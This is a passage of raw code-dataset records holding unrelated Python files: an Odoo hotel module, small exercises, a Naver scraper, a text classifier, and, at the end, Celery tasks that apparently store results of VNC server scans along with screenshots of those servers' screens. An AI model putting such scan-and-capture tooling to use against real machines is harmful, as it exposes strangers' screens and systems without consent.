fields.Float('Duration in Days', help=\"Number of days which will automatically count from the check-in and check-out date. 
\")\n\n @api.constrains('checkin_date','checkout_date')\n def check_dates(self):\n '''\n This method is used to validate the checkin_date and checkout_date.\n -------------------------------------------------------------------\n @param self : object pointer\n @return : raise warning depending on the validation\n '''\n if self.checkin_date >= self.checkout_date:\n raise except_orm(_('Warning'),_('Check in Date Should be less than the Check Out Date!'))\n\n @api.constrains('room_lines')\n def check_folio_room_line(self):\n '''\n This method is used to validate the room_lines.\n ------------------------------------------------\n @param self : object pointer\n @return : raise warning depending on the validation\n '''\n folio_rooms = []\n for room in self[0].room_lines:\n if room.product_id.id in folio_rooms:\n raise except_orm(_('Warning'),_('You Cannot Take Same Room Twice'))\n folio_rooms.append(room.product_id.id)\n\n @api.onchange('checkout_date','checkin_date')\n def onchange_dates(self):\n '''\n This mathod gives the duration between check in checkout if customer will leave only for some\n hour it would be considers as a whole day. If customer will checkin checkout for more or equal\n hours , which configured in company as additional hours than it would be consider as full days\n ---------------------------------------------------------------------------------------------\n @param self : object pointer\n @return : Duration and checkout_date\n '''\n company_obj = self.env['res.company']\n configured_addition_hours = 0\n company_ids = company_obj.search([])\n if company_ids.ids:\n configured_addition_hours = company_ids[0].additional_hours\n myduration = 0 \n if self.checkin_date and self.checkout_date:\n chkin_dt = datetime.datetime.strptime(self.checkin_date, '%Y-%m-%d %H:%M:%S')\n chkout_dt = datetime.datetime.strptime(self.checkout_date, '%Y-%m-%d %H:%M:%S')\n dur = chkout_dt - chkin_dt\n myduration = dur.days\n if configured_addition_hours > 0:\n additional_hours = abs((dur.seconds / 60) / 60)\n if additional_hours >= configured_addition_hours:\n myduration += 1\n self.duration = myduration\n\n @api.model\n def create(self, vals,check=True):\n \"\"\"\n Overrides orm create method.\n @param self: The object pointer\n @param vals: dictionary of fields value.\n @return: new record set for hotel folio.\n \"\"\"\n tmp_room_lines = vals.get('room_lines', [])\n vals['order_policy'] = vals.get('hotel_policy', 'manual')\n if not 'service_lines' and 'folio_id' in vals:\n vals.update({'room_lines':[]})\n folio_id = super(hotel_folio, self).create(vals)\n for line in (tmp_room_lines):\n line[2].update({'folio_id':folio_id})\n vals.update({'room_lines':tmp_room_lines})\n folio_id.write(vals)\n else:\n folio_id = super(hotel_folio, self).create(vals)\n return folio_id\n\n\n @api.onchange('warehouse_id')\n def onchange_warehouse_id(self):\n '''\n When you change warehouse it will update the warehouse of\n the hotel folio as well\n ----------------------------------------------------------\n @param self : object pointer\n '''\n for folio in self:\n order = folio.order_id\n x = order.onchange_warehouse_id(folio.warehouse_id.id)\n return x\n\n\n @api.onchange('partner_id')\n def onchange_partner_id(self):\n '''\n When you change partner_id it will update the partner_invoice_id,\n partner_shipping_id and pricelist_id of the hotel folio as well\n ---------------------------------------------------------------\n @param self : object pointer\n '''\n if self.partner_id:\n partner_rec = 
self.env['res.partner'].browse(self.partner_id.id)\n order_ids = [folio.order_id.id for folio in self]\n if not order_ids:\n self.partner_invoice_id = partner_rec.id\n self.partner_shipping_id = partner_rec.id \n self.pricelist_id = partner_rec.property_product_pricelist.id\n raise Warning('Not Any Order For %s ' % (partner_rec.name))\n else:\n self.partner_invoice_id = partner_rec.id\n self.partner_shipping_id = partner_rec.id\n self.pricelist_id = partner_rec.property_product_pricelist.id\n\n @api.multi \n def button_dummy(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n order = folio.order_id\n x = order.button_dummy()\n return x\n\n\n @api.multi\n def action_invoice_create(self,grouped=False, states=['confirmed', 'done']):\n '''\n @param self : object pointer\n '''\n order_ids = [folio.order_id.id for folio in self]\n sale_obj = self.env['sale.order'].browse(order_ids)\n invoice_id = sale_obj.action_invoice_create(grouped=False,states=['confirmed', 'done'])\n for line in self:\n values = {\n 'invoiced': True,\n 'state': 'progress' if grouped else 'progress',\n }\n line.write(values)\n return invoice_id\n\n\n @api.multi\n def action_invoice_cancel(self):\n '''\n @param self : object pointer\n '''\n order_ids = [folio.order_id.id for folio in self]\n sale_obj = self.env['sale.order'].browse(order_ids)\n res = sale_obj.action_invoice_cancel()\n for sale in self:\n for line in sale.order_line:\n line.write({'invoiced': 'invoiced'})\n sale.write({'state':'invoice_except'})\n return res\n\n @api.multi\n def action_cancel(self):\n '''\n @param self : object pointer\n '''\n order_ids = [folio.order_id.id for folio in self]\n sale_obj = self.env['sale.order'].browse(order_ids)\n rv = sale_obj.action_cancel()\n wf_service = netsvc.LocalService(\"workflow\")\n for sale in self:\n for pick in sale.picking_ids:\n wf_service.trg_validate(self._uid, 'stock.picking', pick.id, 'button_cancel', self._cr)\n for invoice in sale.invoice_ids:\n wf_service.trg_validate(self._uid, 'account.invoice', invoice.id, 'invoice_cancel', self._cr)\n sale.write({'state':'cancel'})\n return rv\n\n @api.multi\n def action_wait(self):\n '''\n @param self : object pointer\n '''\n sale_order_obj = self.env['sale.order']\n res = False\n for o in self:\n sale_obj = sale_order_obj.browse([o.order_id.id])\n res = sale_obj.action_wait()\n if (o.order_policy == 'manual') and (not o.invoice_ids):\n o.write({'state': 'manual'})\n else:\n o.write({'state': 'progress'})\n return res\n\n\n @api.multi\n def test_state(self,mode):\n '''\n @param self : object pointer\n @param mode : state of workflow\n '''\n write_done_ids = []\n write_cancel_ids = []\n if write_done_ids:\n test_obj = self.env['sale.order.line'].browse(write_done_ids)\n test_obj.write({'state': 'done'})\n if write_cancel_ids:\n test_obj = self.env['sale.order.line'].browse(write_cancel_ids)\n test_obj.write({'state': 'cancel'})\n\n @api.multi\n def action_ship_create(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n order = folio.order_id\n x = order.action_ship_create()\n return x\n\n @api.multi\n def action_ship_end(self):\n '''\n @param self : object pointer\n '''\n order_ids = [folio.order_id.id for folio in self]\n for order in self:\n order.write ({'shipped':True})\n\n @api.multi\n def has_stockable_products(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n order = folio.order_id\n x = order.has_stockable_products()\n return x\n\n @api.multi\n def action_cancel_draft(self):\n '''\n @param self : 
object pointer\n '''\n if not len(self._ids):\n return False\n query = \"select id from sale_order_line where order_id IN %s and state=%s\"\n self._cr.execute(query, (tuple(self._ids), 'cancel'))\n cr1 = self._cr\n line_ids = map(lambda x: x[0],cr1.fetchall())\n self.write({'state': 'draft', 'invoice_ids': [], 'shipped': 0})\n sale_line_obj = self.env['sale.order.line'].browse(line_ids)\n sale_line_obj.write({'invoiced': False, 'state': 'draft', 'invoice_lines': [(6, 0, [])]})\n wf_service = netsvc.LocalService(\"workflow\")\n for inv_id in self._ids:\n # Deleting the existing instance of workflow for SO\n wf_service.trg_delete(self._uid,'sale.order', inv_id,self._cr)\n wf_service.trg_create(self._uid,'sale.order', inv_id,self._cr)\n for (id, name) in self.name_get():\n message = _(\"The sales order '%s' has been set in draft state.\") % (name,)\n self.log(message)\n return True\n\nclass hotel_folio_line(models.Model):\n\n @api.one\n def copy(self,default=None):\n '''\n @param self : object pointer\n @param default : dict of default values to be set\n '''\n return self.env['sale.order.line'].copy(default=default)\n\n @api.multi\n def _amount_line(self,field_name, arg):\n '''\n @param self : object pointer\n @param field_name: Names of fields.\n @param arg: User defined arguments\n '''\n return self.env['sale.order.line']._amount_line(field_name, arg)\n\n @api.multi\n def _number_packages(self,field_name, arg):\n '''\n @param self : object pointer\n @param field_name: Names of fields.\n @param arg: User defined arguments\n '''\n return self.env['sale.order.line']._number_packages(field_name, arg)\n\n @api.model\n def _get_checkin_date(self):\n if 'checkin_date' in self._context:\n return self._context['checkin_date']\n return time.strftime('%Y-%m-%d %H:%M:%S')\n\n @api.model\n def _get_checkout_date(self):\n if 'checkout_date' in self._context:\n return self._context['checkout_date']\n return time.strftime('%Y-%m-%d %H:%M:%S')\n\n _name = 'hotel.folio.line'\n _description = 'hotel folio room line'\n\n order_line_id = fields.Many2one('sale.order.line',string='Order Line' ,required=True, delegate=True, ondelete='cascade')\n folio_id = fields.Many2one('hotel.folio',string='Folio', ondelete='cascade')\n checkin_date = fields.Datetime('Check In', required=True,default = _get_checkin_date)\n checkout_date = fields.Datetime('Check Out', required=True,default = _get_checkout_date)\n\n @api.model\n def create(self,vals,check=True):\n \"\"\"\n Overrides orm create method.\n @param self: The object pointer\n @param vals: dictionary of fields value.\n @return: new record set for hotel folio line.\n \"\"\"\n if 'folio_id' in vals:\n folio = self.env[\"hotel.folio\"].browse(vals['folio_id'])\n vals.update({'order_id':folio.order_id.id})\n return super(hotel_folio_line, self).create(vals)\n\n\n @api.multi\n def unlink(self):\n \"\"\"\n Overrides orm unlink method.\n @param self: The object pointer\n @return: True/False.\n \"\"\"\n sale_line_obj = self.env['sale.order.line']\n for line in self:\n if line.order_line_id:\n sale_unlink_obj = sale_line_obj.browse([line.order_line_id.id])\n sale_unlink_obj.unlink()\n return super(hotel_folio_line, self).unlink()\n\n @api.multi\n def uos_change(self, product_uos, product_uos_qty=0, product_id=None):\n '''\n @param self : object pointer\n '''\n for folio in self:\n line = folio.order_line_id\n x = line.uos_change(product_uos, product_uos_qty=0, product_id=None)\n return x\n\n @api.multi\n def product_id_change(self,pricelist, product, qty=0,\n uom=False, qty_uos=0, 
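# Aside: the default-from-context pattern used by _get_checkin_date and
# _get_checkout_date above, with a plain dict standing in for Odoo's
# self._context; purely illustrative.
import time

def default_checkin(context):
    if 'checkin_date' in context:
        return context['checkin_date']
    return time.strftime('%Y-%m-%d %H:%M:%S')

print(default_checkin({'checkin_date': '2021-03-01 12:00:00'}))
print(default_checkin({}))  # falls back to the current timestamp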
uos=False, name='', partner_id=False,\n lang=False, update_tax=True, date_order=False):\n '''\n @param self : object pointer\n '''\n line_ids = [folio.order_line_id.id for folio in self]\n if product:\n sale_line_obj = self.env['sale.order.line'].browse(line_ids)\n return sale_line_obj.product_id_change(pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=partner_id,\n lang=False, update_tax=True, date_order=False)\n\n @api.multi\n def product_uom_change(self, pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=False,\n lang=False, update_tax=True, date_order=False):\n '''\n @param self : object pointer\n '''\n if product:\n return self.product_id_change(pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=partner_id,\n lang=False, update_tax=True, date_order=False)\n\n\n @api.onchange('checkin_date','checkout_date')\n def on_change_checkout(self):\n '''\n When you change checkin_date or checkout_date it will checked it\n and update the qty of hotel folio line\n -----------------------------------------------------------------\n @param self : object pointer\n '''\n if not self.checkin_date:\n self.checkin_date = time.strftime('%Y-%m-%d %H:%M:%S')\n if not self.checkout_date:\n self.checkout_date = time.strftime('%Y-%m-%d %H:%M:%S')\n qty = 1\n if self.checkout_date < self.checkin_date:\n raise except_orm(_('Warning'),_('Checkout must be greater or equal to checkin date'))\n if self.checkin_date:\n diffDate = datetime.datetime(*time.strptime(self.checkout_date, '%Y-%m-%d %H:%M:%S')[:5]) - datetime.datetime(*time.strptime(self.checkin_date, '%Y-%m-%d %H:%M:%S')[:5])\n qty = diffDate.days\n if qty == 0:\n qty = 1\n self.product_uom_qty = qty\n\n\n @api.multi\n def button_confirm(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n line = folio.order_line_id\n x = line.button_confirm()\n return x\n\n @api.multi\n def button_done(self):\n '''\n @param self : object pointer\n '''\n line_ids = [folio.order_line_id.id for folio in self]\n sale_line_obj = self.env['sale.order.line'].browse(line_ids)\n res = sale_line_obj.button_done()\n wf_service = netsvc.LocalService(\"workflow\")\n res = self.write({'state':'done'})\n for line in self:\n wf_service.trg_write(self._uid, 'sale.order', line.order_line_id.order_id.id, self._cr)\n return res\n\n @api.one\n def copy_data(self,default=None):\n '''\n @param self : object pointer\n @param default : dict of default values to be set\n '''\n line_id = self.order_line_id.id \n sale_line_obj = self.env['sale.order.line'].browse(line_id)\n return sale_line_obj.copy_data(default=default)\n\n\nclass hotel_service_line(models.Model):\n\n @api.one\n def copy(self, default=None):\n '''\n @param self : object pointer\n @param default : dict of default values to be set\n '''\n line_id = self.service_line_id.id\n sale_line_obj = self.env['sale.order.line'].browse(line_id)\n return sale_line_obj.copy(default=default)\n\n @api.multi\n def _amount_line(self,field_name, arg):\n '''\n @param self : object pointer\n @param field_name: Names of fields.\n @param arg: User defined arguments\n '''\n for folio in self:\n line = folio.service_line_id\n x = line._amount_line(field_name, arg)\n return x\n\n @api.multi\n def _number_packages(self,field_name, arg):\n '''\n @param self : object pointer\n @param field_name: Names of fields.\n @param arg: User defined arguments\n '''\n for folio in self:\n line = folio.service_line_id\n x = line._number_packages(field_name, arg)\n 
return x\n\n\n _name = 'hotel.service.line'\n _description = 'hotel Service line'\n \n service_line_id = fields.Many2one('sale.order.line','Service Line', required=True, delegate=True, ondelete='cascade')\n folio_id = fields.Many2one('hotel.folio','Folio',ondelete='cascade')\n\n @api.model\n def create(self,vals,check=True):\n \"\"\"\n Overrides orm create method.\n @param self: The object pointer\n @param vals: dictionary of fields value.\n @return: new record set for hotel service line.\n \"\"\"\n\n if 'folio_id' in vals:\n folio = self.env['hotel.folio'].browse(vals['folio_id'])\n vals.update({'order_id':folio.order_id.id})\n return super(models.Model, self).create(vals)\n\n @api.multi\n def unlink(self):\n \"\"\"\n Overrides orm unlink method.\n @param self: The object pointer\n @return: Tru/False.\n \"\"\"\n sale_line_obj = self.env['sale.order.line']\n for line in self:\n if line.service_line_id:\n sale_unlink_obj = sale_line_obj.browse([line.service_line_id.id])\n sale_unlink_obj.unlink()\n return super(hotel_service_line, self).unlink()\n\n @api.multi\n def product_id_change(self,pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=False,\n lang=False, update_tax=True, date_order=False):\n '''\n @param self : object pointer\n '''\n line_ids = [folio.order_line_id.id for folio in self]\n if product:\n sale_line_obj = self.env['sale.order.line'].browse(line_ids)\n return sale_line_obj.product_id_change(pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=partner_id,\n lang=False, update_tax=True, date_order=False)\n\n\n @api.multi\n def product_uom_change(self, pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=False,\n lang=False, update_tax=True, date_order=False):\n '''\n @param self : object pointer\n '''\n if product:\n return self.product_id_change(pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=partner_id,\n lang=False, update_tax=True, date_order=False)\n\n @api.onchange('checkin_date','checkout_date')\n def on_change_checkout(self):\n '''\n When you change checkin_date or checkout_date it will checked it\n and update the qty of hotel service line\n -----------------------------------------------------------------\n @param self : object pointer\n '''\n\n if not self.checkin_date:\n self.checkin_date = time.strftime('%Y-%m-%d %H:%M:%S')\n if not self.checkout_date:\n self.checkout_date = time.strftime('%Y-%m-%d %H:%M:%S')\n qty = 1\n if self.checkout_date < self.checkin_date:\n raise Warning('Checkout must be greater or equal checkin date')\n if self.checkin_date:\n diffDate = datetime.datetime(*time.strptime(self.checkout_date, '%Y-%m-%d %H:%M:%S')[:5]) - datetime.datetime(*time.strptime(self.checkin_date, '%Y-%m-%d %H:%M:%S')[:5])\n qty = diffDate.days\n self.product_uom_qty = qty\n\n @api.multi \n def button_confirm(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n line = folio.service_line_id\n x = line.button_confirm()\n return x\n\n @api.multi\n def button_done(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n line = folio.service_line_id\n x = line.button_done()\n return x\n\n @api.one\n def copy_data(self,default=None):\n '''\n @param self : object pointer\n @param default : dict of default values to be set\n '''\n line_id = self.service_line_id.id\n sale_line_obj = self.env['sale.order.line'].browse(line_id)\n return sale_line_obj.copy_data(default=default)\n\nclass 
hotel_service_type(models.Model):\n\n _name = \"hotel.service.type\"\n _description = \"Service Type\"\n\n ser_id = fields.Many2one('product.category','category', required=True, delegate=True, select=True, ondelete='cascade')\n\n\nclass hotel_services(models.Model):\n\n _name = 'hotel.services'\n _description = 'Hotel Services and its charges'\n\n service_id = fields.Many2one('product.product','Service_id',required=True, ondelete='cascade', delegate=True)\n\nclass res_company(models.Model):\n\n _inherit = 'res.company'\n\n additional_hours = fields.Integer('Additional Hours', help=\"Provide the min hours value for check in, checkout days, whatever the hours will be provided here based on that extra days will be calculated.\")\n\n## vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"hotel/models/hotel.py","file_name":"hotel.py","file_ext":"py","file_size_in_byte":27560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"337651472","text":"# CTI-110\r\n# P2HW2 - Tip Tax Total\r\n# Elianna Hunter\r\n# 2/16/2018\r\n\r\nfoodCharge = float(input(\"Please enter the cost of the food: \") )\r\ntip = 0.18 * foodCharge\r\nsalesTax = 0.07 * foodCharge\r\ntotal = foodCharge + tip + salesTax\r\nprint(\"Food Charge: $\" + format( foodCharge, \",.2f\"), \"Tip: $\" + \\\r\n format(tip, \",.2f\" ), \"Sales Tax: $\" + format(salesTax, \",.2f\"), \\\r\n \"Total: $\" + format(total, \",.2f\"), sep = \"\\n\" )\r\ninput(\"Press enter to exit\" )\r\n\r\n","sub_path":"P2HW2_TipTaxTotal_HunterElianna.py","file_name":"P2HW2_TipTaxTotal_HunterElianna.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"417321030","text":"from insights.parsers import lvm\n\nWARNINGS_CONTENT = \"\"\"\nWARNING\nvalid data 1\nChecksum Error\nvalid data 2\n Failed to write\n Attempt To Close Device\nvalid data 3\n\"\"\".strip()\n\nWARNINGS_FOUND = \"\"\"\nWARNING\nChecksum Error\n Failed to write\n Attempt To Close Device\n\"\"\".strip()\n\n\ndef test_replace_spaces_in_keys():\n data = lvm.replace_spaces_in_keys(\"Lock Args LV Tags\")\n assert data == \"Lock_Args LV Tags\"\n\n\ndef test_find_warnings():\n data = [l for l in lvm.find_warnings(WARNINGS_CONTENT.splitlines())]\n assert len(data) == len(WARNINGS_FOUND.splitlines())\n assert data == WARNINGS_FOUND.splitlines()\n","sub_path":"insights/parsers/tests/test_lvm.py","file_name":"test_lvm.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"9463278","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pyautogui\nimport openpyxl\nimport os\n\nkeyword = pyautogui.prompt(text='검색어를 입력하세요', title='Message')\npage = int(pyautogui.prompt(text='몇 페이지까지 크롤링 할까요?', title='Message'))\n\n# 저장 경로\nsave_path = r\"C:\\Users\\스타트코딩\\Desktop\\웹크롤링\\5주차\\결과.xlsx\"\n\n# 엑셀 생성 (파일이 없으면 만들고, 있으면 만들지 않는다)\nif not os.path.exists(save_path):\n openpyxl.Workbook().save(save_path)\n\n# 엑셀 불러오기\nworkbook = openpyxl.load_workbook(save_path)\n\n# 시트 생성\nsheet = workbook.create_sheet(keyword)\n\nfor i in range(1, page + 1):\n url = f\"https://kin.naver.com/search/list.nhn?query={keyword}&page={i}\"\n\n print(f'=================={i}번째 페이지 입니다.====================')\n response = requests.get(url)\n response.raise_for_status()\n html = response.text\n\n soup = BeautifulSoup(html, 'html.parser')\n\n lists = soup.select('ul.basic1 > 
li')\n\n # 현재 행 번호\n row_num = 1 + (i-1) * 10\n\n for li in lists:\n link_url = li.select_one('dl > dt > a').attrs['href']\n\n response_new = requests.get(link_url)\n response_new.raise_for_status()\n html_new = response_new.text\n soup_new = BeautifulSoup(html_new, 'html.parser')\n title = soup_new.select_one(\"#content div.c-heading__title-inner > div.title\").get_text(strip=True)\n content = soup_new.select(\"#content div.c-heading__content\")\n \n # 있으면 [content의 html객체]\n # 없으면 [] 빈리스트\n \n if len(content) == 1:\n content = content[0].get_text(strip=True)\n else:\n content = \"없음\"\n\n sheet[f'A{row_num}'] = title\n sheet[f'B{row_num}'] = content\n\n workbook.save(save_path)\n row_num = row_num + 1\n","sub_path":"5주차/naver_qna_6.py","file_name":"naver_qna_6.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"225958368","text":"#You are given two 32-bit numbers, N and M, and two bit positions,\n#i and j. Write a method to insert M into N such that M starts\n#at bit j and ends at bit i\n\ndef insertion(N, M, i, j):\n y = 0\n start = (len(N)-j-1)\n end = len(N)-i\n print(start, end)\n for x in range(start, end):\n N[x] = M[y]\n y += 1\n return N\n\nN = [1,0,0,0,0,0,0,0,0,0,0]\nM = [1,0,0,1,1]\ni = 2\nj = 6\n\n#inserted = insertion(N, M, i, j)\n#print(inserted)\n\n#1 Clear the bits j through i in N\n#2 Shift M so that it lines up with bits j through i\n#3 Merge M and N\n\ndef bitInsertion(N, M, i, j):\n allOnes = 0b11111111111\n leftOnes = allOnes << (j+1)\n #Shift the one over by 1 extra, then subtract 1, to make all prev digits 1\n rightOnes = ((0b1 << i)-1)\n mask = leftOnes | rightOnes\n cleared = N & mask\n #shift the M into place\n shifted = (M << i)\n result = (cleared | shifted)\n return(bin(result))\n\nNbit = 0b10000000000\nMbit = 0b10011\nibit = 2\njbit = 6\n\nresult = bitInsertion(Nbit, Mbit, ibit, jbit)\nprint(result)\n","sub_path":"CrackingTheCodingInterview/5BitManipulation/5.1Insertion.py","file_name":"5.1Insertion.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"57535896","text":"from nltk.corpus import stopwords as sw\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import f1_score\r\nfrom sklearn.decomposition import TruncatedSVD\r\nimport numpy as np\r\nimport pandas as pd\r\nimport nltk\r\nimport re\r\nimport time\r\n\r\n\r\nstart_time = time.time()\r\n\r\n#load the dataset\r\ndf = pd.read_csv(\"development.csv\")\r\ndf_eval = pd.read_csv(\"evaluation.csv\")\r\ntrain_documents = df[\"text\"]\r\neval_documents = df_eval[\"text\"]\r\nlabels = np.array(df[\"class\"])\r\n\r\n\r\n#data exploration\r\ncv = CountVectorizer(decode_error = 'ignore')\r\ncv.fit(train_documents)\r\nwords = cv.get_feature_names()\r\n\r\n#write words on file\r\nwith open('words.txt', 'w', encoding=\"utf-8\") as fp:\r\n fp.write('words')\r\n for w in words:\r\n fp.write(\"%s\\n\" %(str(w)))\r\n\r\nprint(\"words written on words.txt\")\r\n\r\n\r\n#stemmer definition and analyzer function\r\nit_stemmer = nltk.stem.SnowballStemmer('italian')\r\n\r\n#this function is used to find words that contain numbers\r\ndef hasNumbers(inputString):\r\n return 
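# Aside: a worked check of the masking arithmetic in bitInsertion above for
# N=0b10000000000, M=0b10011, i=2, j=6; the 11-bit width matches the example.
N, M, i, j = 0b10000000000, 0b10011, 2, 6
all_ones = (1 << 11) - 1                         # same as the hard-coded 0b11111111111
mask = (all_ones << (j + 1)) | ((1 << i) - 1)    # keep bits above j and below i
result = (N & mask) | (M << i)                   # clear bits i..j, then drop M in
print(bin(result))                               # -> 0b10001001100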
bool(re.search(r'\\d', inputString))\r\n\r\n#our analyzer stems words and substitutes number containing tokens with the \"NNN\"\r\n#that is eventually removed by the inclusion of \"NNN\" in our stopwords.\r\ndef analyze_stem(word, stemmer):\r\n if not hasNumbers(word):\r\n return stemmer.stem(word)\r\n else:\r\n return \"NNN\"\r\n\r\n#we build a class for a costum vectorizer that implements a stemmer as an analyzer\r\nclass StemmedTfidfVectorizer(TfidfVectorizer):\r\n def build_analyzer(self):\r\n analyzer = super(StemmedTfidfVectorizer, self).build_analyzer()\r\n return lambda doc: ([analyze_stem(w, it_stemmer) for w in analyzer(doc)])\r\n\r\n#TF-IDF extraction\r\nmy_sw = sw.words('italian')\r\nmy_sw.remove('non')\r\nvectorizer_s = StemmedTfidfVectorizer(analyzer=\"word\",\r\n stop_words=my_sw + [\"nnn\"], max_df = 0.3,\r\n min_df = 3, ngram_range = (1,2),\r\n max_features = 30000)\r\nmatrix = vectorizer_s.fit_transform(train_documents)\r\neval_matrix = vectorizer_s.transform(eval_documents)\r\nprint(matrix.shape)\r\nprint(eval_matrix.shape)\r\nprint(\"--- Vectorization time: %s seconds ---\" % (time.time() - start_time))\r\n\r\n#PCA via a trucated SVD\r\nsvd = TruncatedSVD(n_components = 100)\r\nmatrix_svd = svd.fit_transform(matrix)\r\neval_matrix_svd = svd.transform (eval_matrix)\r\nprint(matrix_svd.shape)\r\nprint(eval_matrix_svd.shape)\r\n\r\n## This portion of code has been left commented to demonstrate the validation\r\n## approach used\r\n# #Hold-out testing\r\n# X_train, X_test, y_train, y_test = train_test_split(matrix_svd, labels, test_size=0.20)\r\n# mlp1 = MLPClassifier(hidden_layer_sizes = (125), alpha = 0.001, early_stopping = True, tol = 0.001, n_iter_no_change = 10, activation = 'identity')\r\n# mlp1.fit(X_train, y_train)\r\n# predictions = mlp1.predict(X_test)\r\n# curr_score = f1_score(y_test, predictions, average='weighted')\r\n# print(curr_score)\r\n\r\nprint(\"--- SVD time: %s seconds ---\" % (time.time() - start_time))\r\n# # Parameters tuning\r\n# # The following code has been commented since the computation of the best\r\n# # parameters requires a very long time and has already been performed during the\r\n# # testing procedure.\r\n# # This function also implements cross validation so it is a nice way to test our\r\n# # pipeline\r\n# parameters = {'activation':['tanh', 'relu', 'logistic', 'identity'],\r\n# 'alpha' : 10.0 ** -np.arange(0, 5),\r\n# 'hidden_layer_sizes' : [(100),(125), (100,50), (100, 50, 25), (200,100,50)],\r\n# 'early_stopping': [True], 'tol' :[0.001]}\r\n# clf = GridSearchCV(MLPClassifier(), parameters, n_jobs=-1, cv = 7)\r\n# clf.fit(matrix_svd, labels)\r\n# print(clf.score(matrix_svd, labels))\r\n# print(clf.best_params_)\r\n\r\n#Training and prediction via our MLPClassifier\r\nmlp1 = MLPClassifier(activation = 'identity',\r\n alpha = 0.001,\r\n hidden_layer_sizes = (125),\r\n early_stopping = True, tol = 0.001,\r\n n_iter_no_change = 10,\r\n verbose = True)\r\nmlp1.fit(matrix_svd,labels)\r\npredictions = mlp1.predict(eval_matrix_svd)\r\n\r\n#write on file\r\nwith open ('out1.csv', 'w') as f:\r\n i=0\r\n f.write('Id,Predicted\\n')\r\n for p in predictions:\r\n f.write(\"%d,%s\\n\" %(i,p))\r\n i += 1\r\nprint(\"results written to out1.csv\")\r\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\r\n","sub_path":"Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"320462529","text":"#!/usr/bin/env python2\n# 
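# A minimal sketch of the stemming-vectorizer pattern defined above, assuming
# nltk and scikit-learn are installed; the toy corpus is illustrative only.
from nltk.stem import SnowballStemmer
from sklearn.feature_extraction.text import TfidfVectorizer

stemmer = SnowballStemmer('italian')

class StemmedTfidf(TfidfVectorizer):
    def build_analyzer(self):
        # Reuse the stock tokenizer, then stem every token it yields.
        analyze = super(StemmedTfidf, self).build_analyzer()
        return lambda doc: [stemmer.stem(w) for w in analyze(doc)]

X = StemmedTfidf().fit_transform(['andare andiamo andato', 'parlare parlato'])
print(X.shape)  # (2, number of distinct stems)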
-*- coding: utf-8 -*-\n# 2014-08-16 09:24 CEST\n# y0ug\nimport sys\nimport argparse\nimport datetime\nimport subprocess\nimport os\nimport threading\nimport hashlib\nimport tempfile\nimport StringIO\nimport base64\n\nfrom celery import Celery, subtask, group, Task\n\nfrom models.mongo import *\n\napp = Celery()\nimport celeryconfig\napp.config_from_object(celeryconfig)\n\nclass DatabaseTask(Task):\n def __init__(self):\n connect(celeryconfig.DATABASE_URI)\n #super(DatabaseTask, self).__init__()\n\n@app.task(queue=\"result\", base=DatabaseTask)\ndef get_lists_ip_whois(n=100):\n out = []\n servers = Server.objects(whois=None)\n ips = [str(x['ip']) for x in servers[:n]]\n return ips\n\n@app.task(queue=\"result\", base=DatabaseTask)\ndef whois_info_add(infos):\n for k,v in infos.items():\n obj = Server.objects.get(ip=k)\n if not obj.whois or obj.whois is None:\n w = Whois()\n obj.whois = w\n\n obj.whois.load_dic(v)\n obj.save()\n\n@app.task(queue=\"result\", base=DatabaseTask)\ndef vnc_server_add_picture(data):\n info = data['info']\n\n try:\n server = Server.objects.get(ip=info['ip'], port=info['port'])\n #server.last_at = ['exec_at']\n except:\n server = Server()\n server.ip = info['ip']\n server.port = info['port']\n server.save()\n\n log = LogTask()\n log.load_dic(data)\n server.logs.append(log)\n server.save()\n\n if server.vnc is None:\n server.vnc = VncServer()\n\n if log.status != \"ok\":\n server.save()\n return server.serialize()\n\n picture = data['picture']\n #picture = base64.b64decode(data['picture'])\n\n fp = StringIO.StringIO(picture)\n\n screen = Screenshot()\n screen.picture.put(fp)\n screen.save()\n fp.close()\n\n screen.build_thumbnail()\n screen.save()\n\n server.vnc.screenshots.append(screen)\n server.save()\n return server.serialize()\n\n@app.task(queue=\"result\", base=DatabaseTask)\ndef vnc_server_info(results):\n out = []\n for result in results:\n info = result['info']\n\n try:\n server = Server.objects.get(ip=info['ip'], port=info['port'])\n server.last_at = result['exec_at']\n except:\n server = Server()\n server.ip = info['ip']\n server.port = info['port']\n server.save()\n\n log = LogTask()\n log.load_dic(result)\n server.logs.append(log)\n server.save()\n\n if not hasattr(server, \"vnc\") or server.vnc is None:\n server.vnc = VncServer()\n\n\n if log.status != \"ok\":\n continue\n\n server.vnc.load_dic(result['vnc'])\n\n 